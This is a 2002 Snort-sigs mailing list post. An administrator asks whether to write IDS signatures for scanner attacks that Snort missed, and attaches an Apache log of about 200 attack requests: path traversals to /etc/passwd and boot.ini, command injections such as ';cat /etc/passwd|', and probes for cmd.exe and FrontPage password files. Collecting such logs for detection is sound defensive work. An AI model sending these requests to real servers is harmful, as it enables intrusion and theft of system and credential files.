[Snort-sigs] a new whisker-like attack -- sigs?

Jon Hart jhart at ...289...
Sat Mar 2 16:53:08 EST 2002


Good evening,

After heavily scanning our entire network, a dialup account in the US
decided to poke at our webserver.  As the alerts started pouring in, I
immediately thought this was someone playing around with whisker.

Turns out, whisker doesn't provide as many checks as this machine
attempted.  

Out of 209 attacks, 103 were detected by snort.  Of those 103, 22 were
detected because they had /etc/passwd in their request string, not
because they were attempting to exploit another vulnerable web
application/script.

Personally, I don't like those odds.  The good thing is that snort
detected the overall attack and I used the apache logs to further
investigate the incident.  

I'm including the apache logs for anyone who is interested, but my
question is, would it be worthwhile for me to bust out rules for these
attacks that snort missed?  I just realized that I'm not including
web-frontpage.rules in my snort config, but a preliminary check shows
that it doesn't really matter 'cause the attacks still would've passed
undetected anyway.

Thoughts?

-jon

(PS.  If it is worth it, I can turn on web-frontpage.rules and fire
these attacks back at our webserver and see what gets detected this
time, but I suspect that might not necessary. ) 
-------------- next part --------------
HEAD / HTTP\1.0
HEAD /// HTTP/1.0
HEAD ///server-info HTTP/1.0
HEAD ///server-status HTTP/1.0
HEAD /site/eg/ HTTP/1.0
HEAD /doc/ HTTP/1.0
HEAD /~nobody/ HTTP/1.0
HEAD ///manual/ HTTP/1.0
HEAD /cgi-bin/ HTTP/1.0
HEAD /cgi-bin/ad.cgi HTTP/1.0
HEAD /cgi-bin/aglimpse HTTP/1.0
HEAD /cgi-bin/AnyForm2 HTTP/1.0
HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0
HEAD /cgi-bin/bsguest.cgi HTTP/1.0
HEAD /cgi-bin/bslist.cgi HTTP/1.0
HEAD /cgi-bin/campas HTTP/1.0
HEAD /// HTTP/1.0
HEAD ///carbo.ddl HTTP/1.0
HEAD /cgi-bin/count.cgi HTTP/1.0
HEAD /cgi-bin/cgforum.cgi HTTP/1.0
HEAD /cgi-bin/faxsurvey HTTP/1.0
HEAD /cgi-bin/gbook.cgi HTTP/1.0
HEAD /cgi-bin/htsearch HTTP/1.0
HEAD /cgi-bin/htmlscript HTTP/1.0
HEAD /cgi-bin/jj HTTP/1.0
HEAD /technote/ HTTP/1.0
HEAD /cgi-bin/mmstdod.cgi HTTP/1.0
HEAD /cgi-bin/newdesk HTTP/1.0
HEAD /cgi-bin/register.cgi HTTP/1.0
HEAD /cgi-bin/simplestguest.cgi HTTP/1.0
HEAD /cgi-bin/statusconfig.pl HTTP/1.0
HEAD /cgi-bin/webgais HTTP/1.0
HEAD /iisadmpwd/ HTTP/1.0
HEAD /cgi-bin/webgais HTTP/1.0
HEAD /cgi-bin/perl.exe HTTP/1.0
HEAD /cgi-dos/ HTTP/1.0
HEAD /scripts/ HTTP/1.0
HEAD /cgi-bin/infosrch.cgi HTTP/1.0
HEAD /cgi-bin/rguest.exe HTTP/1.0
HEAD /mall_log_files/ HTTP/1.0
HEAD /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0
HEAD /Admin_files/ HTTP/1.0
HEAD /cgi-bin/a1stats/ HTTP/1.0
GET ///quote.html HTTP/1.0
GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0
HEAD /cgi-bin/dcboard.cgi HTTP/1.0
GET /cgi-bin/nph-maillist.pl HTTP/1.0
GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0
GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0
HEAD / HTTP/1.0
HEAD /cgi-bin/ikonboard/ HTTP/1.0
GET http://ms_proxy_auth_query/ HTTP/1.0
HEAD /foldoc/ HTTP/1.0
GET /*.idc HTTP/1.0
HEAD /cgi-bin/adcycle/ HTTP/1.0
GET /iisadmin/ HTTP/1.0
GET /cgi-bin/store.cgi?StartID=../etc/passwd%00.html HTTP/1.0
GET /default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr HTTP/1.0
HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0
GET /msadc/msadcs.dll HTTP/1.0
HEAD /cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html  HTTP/1.0
GET /scripts/iisadmin/bdir.htr HTTP/1.0
GET /cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd HTTP/1.0
GET /iissamples/issamples/query.idq HTTP/1.0
GET /cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0
GET /iissamples/issamples/fastq.idq HTTP/1.0
HEAD /cgi-bin/mailnews.cgi HTTP/1.0
GET /iissamples/exair/search/search.idq HTTP/1.0
HEAD /cgi-bin/newsdesk.cgi HTTP/1.0
GET /iissamples/exair/search/query.idq HTTP/1.0
HEAD /cgi-bin/pals-cgi HTTP/1.0
GET /prxdocs/misc/prxrch.idq HTTP/1.0
HEAD /ROADS/ HTTP/1.0
GET /iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full HTTP/1.0
GET /cgi-bin/sendtemp.pl?templ=../../etc/passwd HTTP/1.0
GET /iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full HTTP/1.0
HEAD /way-board/ HTTP/1.0
GET /scripts/samples/search/qfullhit.htw HTTP/1.0
GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0
GET /scripts/samples/search/qsumrhit.htw HTTP/1.0
HEAD /cgi-bin/DCShop/Orders/orders.txt HTTP/1.0
GET /abczxv.htw HTTP/1.0
HEAD /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0
GET /scripts/samples/search/author.idq HTTP/1.0
GET /cgi-bin/get32.exe HTTP/1.0
GET /scripts/samples/search/filesize.idq HTTP/1.0
GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.0
GET /scripts/samples/search/filetime.idq HTTP/1.0
GET ///index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0
GET /scripts/samples/search/query.idq HTTP/1.0
GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0
GET /scripts/samples/search/queryhit.idq HTTP/1.0
GET ///edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 HTTP/1.0
GET /scripts/samples/search/simple.idq HTTP/1.0
GET /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0
GET /scripts/samples/search/webhits.exe HTTP/1.0
GET /cfcache.map HTTP/1.0
GET /_vti_pvt/administrators.pwd HTTP/1.0
GET /_vti_pvt/authors.pwd HTTP/1.0
GET /_vti_pvt/users.pwd HTTP/1.0
GET /_vti_pvt/service.pwd HTTP/1.0
POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1
GET /cgi-bin/ HTTP/1.0
GET /scripts/ HTTP/1.0
GET /cgi-bin/sh HTTP/1.0
GET /cgi-bin/csh HTTP/1.0
GET /cgi-bin/ksh HTTP/1.0
GET /cgi-bin/cmd.exe?/c HTTP/1.0
GET /scripts/cmd.exe?/c HTTP/1.0
GET /cgi-bin/cmd32.exe HTTP/1.0
GET /scripts/cmd32.exe HTTP/1.0
GET /cgi-bin/perl.exe?-v HTTP/1.0
GET /scripts/perl.exe?-v HTTP/1.0
GET /scripts/tools/newdsn.exe HTTP/1.0
GET /_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15 HTTP/1.0
GET /rightfax/fuwww.dll/? HTTP/1.0
GET /iissamples/issamples/query.asp HTTP/1.0
GET /samples/search/queryhit.htm HTTP/1.0
GET /scripts/*%0a.pl HTTP/1.0
GET /iissamples/exair/search/advsearch.asp HTTP/1.0
GET /iisadmpwd/aexp3.htr HTTP/1.0
GET /scripts/repost.asp HTTP/1.0
OPTIONS / HTTP/1.0
OPTIONS /users/ HTTP/1.0
OPTIONS /cgi-bin/ HTTP/1.0
OPTIONS /scripts/ HTTP/1.0
GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0
GET /msadc/samples/selector/showcode.asp HTTP/1.0
GET /?PageServices HTTP/1.0
GET /search? HTTP/1.0
GET /index.html%20 HTTP/1.0
GET /scripts/rguest.exe HTTP/1.0
GET /cgi-bin/rguest.exe HTTP/1.0
GET /scripts/wguest.exe HTTP/1.0
GET /cgi-bin/wguest.exe HTTP/1.0
GET /cgi-bin/get32.exe HTTP/1.0
GET /cgi-bin/alibaba.pl HTTP/1.0
GET /cgi-bin/tst.bat HTTP/1.0
GET /cgi-win/uploader.exe HTTP/1.0
GET /cgi-bin/FormHandler.cgi HTTP/1.0
GET /cgi-bin/testcgi HTTP/1.0
GET /cgi-bin/test-cgi/*?* HTTP/1.0
GET /cgi-bin/test.cgi HTTP/1.0
GET /cgi-bin/enivron.pl HTTP/1.0
GET /scripts/environ.pl HTTP/1.0
GET /server-info HTTP/1.0
GET /server-status HTTP/1.0
GET /cgi-bin/tcsh HTTP/1.0
GET /cgi-bin/cgitest.exe HTTP/1.0
GET /~root HTTP/1.0
GET /~ftp HTTP/1.0
GET /cgi-bin/phf?Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone= HTTP/1.0
GET /cgi-bin/count.cgi HTTP/1.0
GET /cgi-bin/nph-test-cgi HTTP/1.0
GET /cgi-bin/webdist.cgi HTTP/1.0
GET /cgi-bin/aglimpse.cgi HTTP/1.0
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a HTTP/1.0
GET /cgi-bin/jj HTTP/1.0
GET /cgi-bin/formmail HTTP/1.0
GET /cgi-bin/formmail.pl HTTP/1.0
GET /cgi-bin/faxsurvey?/bin/cat%20/etc/passwd HTTP/1.0
GET /cgi-bin/view-source?../../../../../../../etc/passwd HTTP/1.0
GET /scripts/srchadm/webhits.exe HTTP/1.0
GET /scripts/tools/mkilog.exe HTTP/1.0
GET /scripts/tools/mkplog.exe HTTP/1.0
GET /cgi-bin/query?mss=../../../../../../../etc/passwd HTTP/1.0
GET /scripts/htimage.exe?2,2 HTTP/1.0
GET /cgi-bin/htimage.exe?2,2 HTTP/1.0
GET /scripts/samples/search/author.idq HTTP/1.0
GET /scripts/samples/search/filesize.idq HTTP/1.0
GET /scripts/samples/search/filetime.idq HTTP/1.0
GET /scripts/samples/search/query.idq HTTP/1.0
GET /scripts/samples/search/queryhit.idq HTTP/1.0
GET /scripts/samples/search/simple.idq HTTP/1.0
GET /scripts/samples/search/qfullhit.htw HTTP/1.0
GET /scripts/samples/search/qsumrhit.htw HTTP/1.0
GET /scripts/samples/search/webhits.exe HTTP/1.0
GET /robots.txt HTTP/1.0
GET /cgi-bin/echo.bat?&dir+c:\ HTTP/1.0
GET /cgi-bin/hello.bat?&dir+c:\ HTTP/1.0
GET /cgi-bin/htsearch?exclude=%60/etc/passwd%60 HTTP/1.0
GET /cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd| HTTP/1.0
GET /cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1 HTTP/1.0
GET /names.nsf/?Open HTTP/1.0
GET /catalog.nsf/?Open HTTP/1.0
GET /log.nsf/?Open HTTP/1.0
GET /domlog.nsf/?Open HTTP/1.0
GET /domcfg.nsf/?Open HTTP/1.0
GET /cgi-bin/sojourn.cgi?cat=../../../../../../../etc/passwd HTTP/1.0
GET /ows-bin/perlidlc.bat?&dir HTTP/1.0
GET /cgi-bin/windmail.exe HTTP/1.0
GET /_vti_bin/shtml.dll HTTP/1.0
GET /.htaccess HTTP/1.0
GET /_vti_pvt/doctodep.btr HTTP/1.0
GET /carbo.dll?icatcommand=..\..\..\..\boot.ini&catalogname=catalog HTTP/1.0
GET /cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\boot.ini HTTP/1.0
GET /cfdocs/expeval/openfile.cfm HTTP/1.0
GET /cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|' HTTP/1.0
GET /cgi-bin/MachineInfo HTTP/1.0
GET /mylog.phtml?screen=/etc/passwd HTTP/1.0
GET /mlog.phtml?screen=/etc/passwd HTTP/1.0
GET /cgi-bin/wrap HTTP/1.0
GET /ows-bin/oasnetconf.exe?-l%20-s%20CerberusInternetScanner HTTP/1.0
GET /ows-bin/oaskill.exe?abcde.exe HTTP/1.0
GET /cgi-shl/win-c-sample.exe HTTP/1.0
GET /robots.txt HTTP/1.1
GET /tools/ HTTP/1.1
GET /home/ftp HTTP/1.1
GET /home/www HTTP/1.1


More information about the Snort-sigs mailing list